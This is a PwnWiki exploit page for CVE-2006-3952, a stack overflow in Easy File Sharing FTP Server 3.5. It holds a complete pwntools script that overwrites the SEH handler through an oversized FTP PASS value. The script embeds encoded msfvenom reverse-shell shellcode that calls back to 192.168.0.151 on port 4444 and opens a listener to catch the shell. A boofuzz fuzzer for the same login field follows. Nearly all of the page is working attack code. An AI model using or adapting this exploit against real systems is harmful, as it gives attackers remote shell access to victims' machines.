免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
INFO
# CVE-2006-3952 Exploit for Easy File Sharing FTP Server 3.5 on Win7 32 Based on: * pwntools * msfvenom / reverse\_tcp payload Vulnerable app available at https://www.exploit-db.com/apps/0efddb6d04f4125d7c1f104c6b1c60a0-efsfs.exe Simple SEH overrite + couple jumps back, due to stack being corrupted after SEH value.
exploit.py
#!/usr/bin/env python3
#
# Exploit for Easy File Sharing FTP Server 3.5 (CVE-2006-3952)
# * pwntools
# * metasploit reverse_tcp payload
# * Ropper
import sys
import pwn
from threading import Thread
# set target info
RHOST = '127.0.0.1'
RPORT = 21
LPORT = 4444
def generate_payload():
NOP = pwn.asm("nop") # noqa: F841
payload = b""
# msfvenom -f python -v shellcode -p windows/shell_reverse_tcp LHOST=192.168.0.151 LPORT=4444 EXITFUNC=thread -b "\x00" -e x86/alpha_mixed # noqa: E501
shellcode = b""
shellcode += b"\x89\xe3\xdb\xd9\xd9\x73\xf4\x5f\x57\x59\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += b"\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += b"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += b"\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += b"\x39\x6c\x38\x68\x6b\x32\x45\x50\x43\x30\x73\x30"
shellcode += b"\x73\x50\x4c\x49\x6b\x55\x36\x51\x6f\x30\x71\x74"
shellcode += b"\x6e\x6b\x50\x50\x54\x70\x4e\x6b\x46\x32\x64\x4c"
shellcode += b"\x6e\x6b\x42\x72\x62\x34\x4e\x6b\x63\x42\x55\x78"
shellcode += b"\x36\x6f\x4f\x47\x32\x6a\x54\x66\x66\x51\x59\x6f"
shellcode += b"\x6e\x4c\x55\x6c\x65\x31\x53\x4c\x63\x32\x56\x4c"
shellcode += b"\x71\x30\x7a\x61\x78\x4f\x64\x4d\x77\x71\x4b\x77"
shellcode += b"\x7a\x42\x5a\x52\x66\x32\x31\x47\x4e\x6b\x52\x72"
shellcode += b"\x54\x50\x6e\x6b\x52\x6a\x57\x4c\x6c\x4b\x30\x4c"
shellcode += b"\x77\x61\x53\x48\x58\x63\x53\x78\x63\x31\x4b\x61"
shellcode += b"\x30\x51\x6c\x4b\x62\x79\x51\x30\x65\x51\x69\x43"
shellcode += b"\x4c\x4b\x72\x69\x44\x58\x49\x73\x76\x5a\x53\x79"
shellcode += b"\x6e\x6b\x55\x64\x6e\x6b\x47\x71\x38\x56\x74\x71"
shellcode += b"\x6b\x4f\x6c\x6c\x6a\x61\x68\x4f\x66\x6d\x55\x51"
shellcode += b"\x4a\x67\x74\x78\x6b\x50\x34\x35\x39\x66\x37\x73"
shellcode += b"\x31\x6d\x78\x78\x57\x4b\x71\x6d\x47\x54\x54\x35"
shellcode += b"\x69\x74\x50\x58\x4c\x4b\x31\x48\x67\x54\x65\x51"
shellcode += b"\x38\x53\x62\x46\x6c\x4b\x36\x6c\x52\x6b\x6c\x4b"
shellcode += b"\x63\x68\x57\x6c\x75\x51\x69\x43\x6e\x6b\x74\x44"
shellcode += b"\x4c\x4b\x43\x31\x4a\x70\x4f\x79\x47\x34\x51\x34"
shellcode += b"\x61\x34\x33\x6b\x63\x6b\x45\x31\x63\x69\x51\x4a"
shellcode += b"\x36\x31\x79\x6f\x79\x70\x43\x6f\x71\x4f\x30\x5a"
shellcode += b"\x4c\x4b\x67\x62\x78\x6b\x6e\x6d\x71\x4d\x71\x78"
shellcode += b"\x57\x43\x47\x42\x37\x70\x73\x30\x33\x58\x30\x77"
shellcode += b"\x74\x33\x64\x72\x61\x4f\x73\x64\x31\x78\x52\x6c"
shellcode += b"\x54\x37\x51\x36\x36\x67\x39\x6f\x4a\x75\x6f\x48"
shellcode += b"\x4c\x50\x77\x71\x73\x30\x63\x30\x66\x49\x49\x54"
shellcode += b"\x62\x74\x50\x50\x61\x78\x67\x59\x6d\x50\x62\x4b"
shellcode += b"\x73\x30\x39\x6f\x68\x55\x50\x50\x76\x30\x72\x70"
shellcode += b"\x46\x30\x63\x70\x30\x50\x31\x50\x52\x70\x31\x78"
shellcode += b"\x58\x6a\x44\x4f\x39\x4f\x79\x70\x69\x6f\x5a\x75"
shellcode += b"\x6a\x37\x50\x6a\x44\x45\x35\x38\x4f\x30\x59\x38"
shellcode += b"\x53\x30\x6e\x77\x33\x58\x63\x32\x35\x50\x36\x71"
shellcode += b"\x33\x6c\x6d\x59\x69\x76\x70\x6a\x56\x70\x36\x36"
shellcode += b"\x61\x47\x61\x78\x4c\x59\x69\x35\x34\x34\x30\x61"
shellcode += b"\x69\x6f\x7a\x75\x6f\x75\x6b\x70\x34\x34\x64\x4c"
shellcode += b"\x69\x6f\x50\x4e\x57\x78\x72\x55\x38\x6c\x71\x78"
shellcode += b"\x38\x70\x6e\x55\x6e\x42\x36\x36\x39\x6f\x6e\x35"
shellcode += b"\x51\x78\x55\x33\x70\x6d\x50\x64\x45\x50\x6c\x49"
shellcode += b"\x48\x63\x61\x47\x62\x77\x50\x57\x46\x51\x39\x66"
shellcode += b"\x53\x5a\x55\x42\x63\x69\x71\x46\x59\x72\x69\x6d"
shellcode += b"\x61\x76\x39\x57\x47\x34\x35\x74\x67\x4c\x36\x61"
shellcode += b"\x43\x31\x6c\x4d\x47\x34\x64\x64\x66\x70\x69\x56"
shellcode += b"\x77\x70\x57\x34\x73\x64\x62\x70\x32\x76\x62\x76"
shellcode += b"\x52\x76\x33\x76\x56\x36\x42\x6e\x30\x56\x42\x76"
shellcode += b"\x63\x63\x43\x66\x55\x38\x70\x79\x68\x4c\x55\x6f"
shellcode += b"\x4b\x36\x59\x6f\x78\x55\x6d\x59\x4d\x30\x32\x6e"
shellcode += b"\x61\x46\x62\x66\x69\x6f\x66\x50\x72\x48\x67\x78"
shellcode += b"\x4b\x37\x37\x6d\x63\x50\x39\x6f\x6b\x65\x4f\x4b"
shellcode += b"\x6b\x50\x37\x6d\x36\x4a\x74\x4a\x75\x38\x4e\x46"
shellcode += b"\x6a\x35\x6d\x6d\x6d\x4d\x6b\x4f\x38\x55\x37\x4c"
shellcode += b"\x46\x66\x33\x4c\x65\x5a\x6d\x50\x4b\x4b\x69\x70"
shellcode += b"\x54\x35\x45\x55\x4d\x6b\x31\x57\x75\x43\x74\x32"
shellcode += b"\x30\x6f\x61\x7a\x33\x30\x52\x73\x39\x6f\x39\x45"
shellcode += b"\x41\x41"
payload += b"," * 900 # required to trigger an exception
payload += NOP * 560
payload += shellcode # stage 3
payload += NOP * (2555 - len(payload))
payload += pwn.asm("jmp $-1300") # stage 2, jump even further to stage3
PPR_GADGET = pwn.p32(0x10012ff2) # add esp, 8; ret from ssleay32.dll
payload += pwn.asm("jmp $-5; nop; nop") # trampoline to jump further backward to stage2
payload += PPR_GADGET
payload += NOP * (4000 - len(payload))
return payload
def attack():
r = pwn.remote(RHOST, RPORT, typ="tcp")
print(r.recv(1024))
r.send("USER ftptest\r\n")
print(r.recv(1024))
p = b"PASS %b\r\n" % generate_payload()
print(p)
r.send(p)
if __name__ == "__main__":
if len(sys.argv) > 1:
RHOST = sys.argv1
thread = Thread(target=attack)
thread.start()
listener = pwn.listen(port=LPORT)
listener.wait_for_connection()
listener.interactive()
thread.join()
fuzz.py
#!/usr/bin/env python
from boofuzz import *
import sys
def hello(target, logger, session, *args, **kwargs):
try:
banner = target.recv(1000)
except Exception:
logger.log_info("Target down. Exiting.")
sys.exit(-1)
logger.log_check("Banner received")
if not banner.startswith("220 Welcome to Easy File Sharing FTP Server!"):
logger.log_fail("Incorrect banner: {}".format(banner))
sys.exit(-2)
def main():
session = Session(
target=Target(connection=SocketConnection("192.168.0.101", 21, proto='tcp')),
)
s_initialize(name="Command")
s_static("USER ftptest\r\n")
s_static("PASS ")
s_string("1")
s_static("\r\n")
session.connect(s_get("Command"), callback=hello)
session.fuzz()
if __name__ == "__main__":
main()
pwnwiki.com
